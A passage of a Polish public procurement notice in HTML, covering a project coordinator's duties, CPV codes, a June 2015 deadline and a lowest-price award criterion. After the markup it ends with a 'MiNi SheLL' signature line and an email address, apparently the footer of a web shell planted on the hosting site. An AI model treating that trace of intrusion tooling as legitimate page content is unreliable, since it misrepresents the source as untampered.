o ewentualnych problemach i zakłóceniach w przebiegu realizacji zajęć bądź innych zaistniałych sytuacjach, które miałyby wpływ na nieprawidłową realizację całego projektu,
13)nadzór nad przekazaniem zakupionego sprzętu, pakietów edukacyjnych, pomocy dydaktycznych i materiałów biurowych do zajęć zakupionych w ramach projektu,
14)nadzór nad przechowywaniem i archiwizowaniem dokumentacji projektowej w szkole,
15)wykonywania innych zajęć wynikających z potrzeb prawidłowego zrealizowania projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com